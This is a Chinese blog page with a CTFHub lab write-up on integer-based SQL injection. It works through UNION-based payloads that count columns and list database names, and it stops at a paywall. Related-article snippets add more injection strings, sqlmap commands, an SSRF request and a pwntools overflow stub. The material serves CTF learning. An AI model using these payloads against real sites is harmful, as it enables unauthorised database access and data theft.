CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记

最新推荐文章于 2025-02-06 08:46:23 发布
最新推荐文章于 2025-02-06 08:46:23 发布
阅读量682 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45716477/article/details/115799980
本文详细介绍了CTFHub中关于Web SQL注入的各种类型,包括整数型、字符型、报错注入、布尔盲注、时间盲注等,并提供了具体的WriteUp,同时探讨了如何绕过空格过滤、Cookie、UA和Refer注入,帮助读者深入理解SQL注入技巧。

目录

题解

0x01 整数型注入

输个1试试?那就试试吧。
输入1 and 1=11 and 1=2
在这里插入图片描述
在这里插入图片描述
输入1 and 1=2时界面与1 and 1=1不同,说明服务端解析了输入的代码,此处存在SQL注入漏洞。
开始注入

输入1 order by x(x可以是1,2,3……)查看字段数。
1 order by 1
1 order by 2
1 order by 3
发现输入1 order by 3时无回显,说明字段数是2。

为什么要查看字段数?
后续注入需要用到union操作符,而根据union操作符的说明,union内部的select语句必须拥有相同数量的列,即通过union连接的两条SQL语句必须字段数一样。[^1]
随后输入123 union select 1,2可以看到第一个和第二个字段都可以正常在网页中显示。
在这里插入图片描述
输入123 union select 1,database()成功看到当前数据库名称为sqli
在这里插入图片描述
输入123 union select 1,group_concat(schema_name)from information_schema.schemata可以看到所有数据库的名称。

最低0.47元/天 解锁文章

新学期VIP享超值加赠
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
[网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF、文件上传、SQL注入、代码审计、中国蚁剑)
杨秀璋的专栏
05-13 8129
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来博友们学习,希望您喜欢,一起进步。这篇文章主要介绍5月9日参加津门杯CTF题目知识,包括power_cut、hate_php、Go0SS、HploadHub和easysql,涉及知识点包括备份文件、SSRF、文件上传、SQL注入、302重定位、代码审计、中国蚁剑等。参加比赛真的能学到很多知识,同时这些大佬是真的厉害,自己真的菜,我们只做出来6道题,需要学习的知识非常多,也非常感谢师弟们的努力。人生路上,要珍惜好每一天,努力奋斗
CTFHub | 整数型注入
尼泊罗河伯的博客
10-25 2985
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
CTFHub数据库注入WriteUP
tangshuangsss的专栏
06-23 531
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介CTFHub 为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。「赛事中心」提供全网...
CTF之旅(CTFHub技能树+详细Write up+持续更新ing)(SQL注入
weixin_51563603的博客
09-04 1853
目录其他CTFHub题目WriteUP地址前言SQL注入整数型注入字符型注入 其他CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就分了几段写,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 3.密码口令+XSS(已完结) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意
黄聪:SQL注入代码实例。如何使用SQL注入检查漏洞、猜测数据库表明、列名、帐号密码...
weixin_34259159的博客
07-16 185
检查漏洞 1' or 1=1  or ('1' = '11' or 1=1)  or '1' = '11' or 1=1 or '1' = '11'/**/or/**/1=1/**/or/**/'1'= '1猜表名1' or 0<(select count(*) from admin) and '1' = '11'/**/or/**/0<(select/**/count(*)/**/...
CtfHub-web-sql注入
BROTHERYY的博客
05-08 618
1.整数型注入 确定注入点! 得到数据库以及版本 得到字段! 字段也是flag 2.字符型注入 这里和数字型差不多 使用单引号闭合就可以 by 3 就没回显 确定只有2 得到数据库和版本号 发现和上面的数字型一样 直接注flag吧 3.报错注入 这里直接sqlmap跑一把 猜测还是一样的表名,字段名直接一把撸到底 4.bool注入 这个自己尝试写了个脚本跑出来了 但是自己的脚本水平太烂 ! 下步加强学习 上面试sqlmap的下面是自己写的 5.时间注入 这里也是使用脚本跑,这里发现自己的脚本和s
CTFhubweb-信息泄露-PHPINFO_WriteUp
weixin_45633243的博客
11-02 1705
目录导航开启题目得到FLAG扩展_phpinfo 开启题目 得到FLAG 可以手动浏览,也可以 ctrl+F 搜索 flag 或者 ctfhub 可以看到 $_ENV[‘FLAG’] 即为flag 扩展_phpinfo 什么是 phpinfo phpinfo是php内置的函数,用于以网页的形式输出 php的具体配置信息。 使用:phpinfo — 输出关于 PHP 配置的信息 bool phpinfo([ int $what = INFO_ALL]) 输出 PHP 当前状态的大量信息,包含
CTF SQL注入学习笔记
最新发布
2401_86190146的博客
02-06 1182
部分内容来自于SQL注入由简入精_哔哩哔哩_bilibili1.mysqli_error():返回最近调用函数的最后一个错误描述语法:mysqli_error(connection) 规定要使用的Mysql连接; 返回一个带有错误描述的字符串。如果没有错误发生则返回 ""2.mysqli_errno() :函数返回最近调用函数的最后一个错误代码。语法:mysqli_errno(connection);返回错误代码值。如果没有错误发生则返回 0。3.mysqli_fetch_array():从结果集中取得一行
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透和隐写术解密
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透和隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”和“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
CTFhubweb-信息泄露-目录遍历_WriteUp
weixin_45633243的博客
11-01 6791
目录导航1. 开启题目 审题2. 快速拿到flag3. 扩展_使用代码 1. 开启题目 审题 目录遍历,实际上就是让新手熟悉信息资源目录,手动找就能找到。真·有手就行。 2. 快速拿到flag 开启环境后看到有按钮,直接点进去进入目录。 简单的遍历目录一个个找下去就能找到,每次开启不同的环境,flag也会不同。【避免投机取巧】 3. 扩展_使用代码 如果文件太多手动无法找到怎么办,此时就需要写代码拿到flag了。 仔细观察url,每点入一个目录,就会有/1/ 、/2/ 一共四个目录,有规律,可以通
CTFHub-SSRF-Writeup
liuhanzhe的专栏
12-15 2975
SSRF SSRF常见利用方式总结 内网访问 直接构造访问请求,获取flag /?url=127.0.0.1/flag.php 伪协议读取文件 根据题目提示使用file://协议,尝试一般web目录/var/www/html/ 端口扫描 提示端口范围8000到9000 /?url=127.0.0.1:8000 使用burpsuite对端口进行爆破,即可得到端口,访问获取flag POST请求 访问/?url=127.0.0.1/flag.ph,返回页面 包含一个form和隐藏的key,推测需要在fo
CTF之旅(CTFHub技能树+详细Write up+持续更新ing)(首页)
weixin_51563603的博客
10-23 7734
CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就写了个首页,汇总一下地址,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 3.密码口令+XSS(已完结) 4.SQL注入(已完结) 5.文件上传(持续更新) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意思,每个人有每个
【CTF】CTFHub——web
m0_52923241的博客
09-18 916
SQL 整数型注入 题目提示整数型注入,尝试输入1,有回显,输入-1 order by一直到3,没有回显,说明有两列 做题步骤: -1 union select 1,database()——sqli -1 union select 1,group_concat(schema_name) from information_schema.schemata——information_schema,performance_schema,mysql,sqli -1 union select 1,group_conc
万字sql注入学习过程--------从一个查询语句到SQL注入原理——包含各种注入姿势及相关CTF,靶场,漏洞实战 随时补充内容
AAAAAAAAAAAA66的博客
11-30 2778
从第一次接触到SQL注入到现在已经有小半年了,简单打了个DVWA靶场之后便没怎么用手工注入,非常依赖工具,最近遇到几道需要手动注入的CTF题目,发现自己对sql注入的原理只是停留在一个基础的理论之上,所以就写这一篇文章对自己的sql注入进行新的梳理。 ——————————————————————————————————————————— 开始介绍sql注入漏洞之前,先介绍一个基础的mysql查询语句(学过数据库的同学直接跳走) 我们经常遇到一个这样的需要我们输入的表格 我们在这输入一个 1 .
mysql 注入 爆表_墨者学院 – SQL注入实战-MySQLWriteup
weixin_34847099的博客
02-01 270
两种解法一、利用sqlmap及其tamper模块base64encode使用1. 看到id后面的参数可能是base64加密后的结果,我们尝试解密,解密结果为12.查看当前的系统信息sqlmap -u "http://219.153.49.228:43371/show.php?id=MQo=" --tamper=base64encode3.暴库sqlmap -u "http://219.153.49...
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)漏洞复现
ADummy的博客
02-23 967
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞 by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>信息被爆出 0x01漏洞介绍 ​ Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。 影响版本 Drupal < 7.31 0x02漏洞复现 payload: POST /?q=node&destinati
注入漏洞-sql注入
热门推荐
一个很酷的人
04-30 4万+
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入...
CTFHub技能树:http协议 writeup
qq_45653588的博客
07-22 742
0X00 请求方式 首先进去看见提示说http请求方式,使用CTFXXB方式,就可以得到flag。 于是使用burp抓包,将请求头的GET改为CTFHUB,发送 响应内容里面得到了flag。 0X01 302跳转 首先进去看见界面,结合标题,点击链接重定向回index.html。 在这可以使用curl查看,curl 命令是支持请求重定向的,可以通过 -L 参数配置,直接得到flag。 这题也可以使用burp抓包,发送得到flag。 0X02 Cookie欺骗、认证、伪造 第三题进去后,提示说只有
CTFHub-技能树-pwn
01-01
### CTFHub Pwn 技能树教程资源 Pwn 类型的挑战通常涉及利用程序中的漏洞来获取控制权。这类题目可以测试参赛者对二进制文件的理解以及逆向工程的能力。 在 CTF竞赛中,`pwntools` 是一个非常流行的 Python 库,用于开发针对这些类型的攻击工具[^3]。下面是一个简单的例子展示了如何使用 `pwntools` 进行远程连接并发送有效载荷: ```python from pwn import * p = remote("example.com", port_number) payload = b'a'*(buffer_size)+pack(address, 64) # 构造溢出字符串加上返回地址 p.sendline(payload) p.interactive() ``` 此代码片段显示了一个典型的缓冲区溢出攻击过程,其中构造特定长度的数据串去覆盖函数栈帧内的保存指针,并将其重定向到恶意指令处执行。 为了深入学习 pwn 技巧,在线社区提供了丰富的资源和支持材料。例如,《黑客&网络安全入门&进阶学习资源包》不仅涵盖了基础理论还包含了实际操作指南[^1]。此外,参 CTF 比赛之后阅读优秀的 writeup 可以为理解不同场景下的解决方案提供很大帮助[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值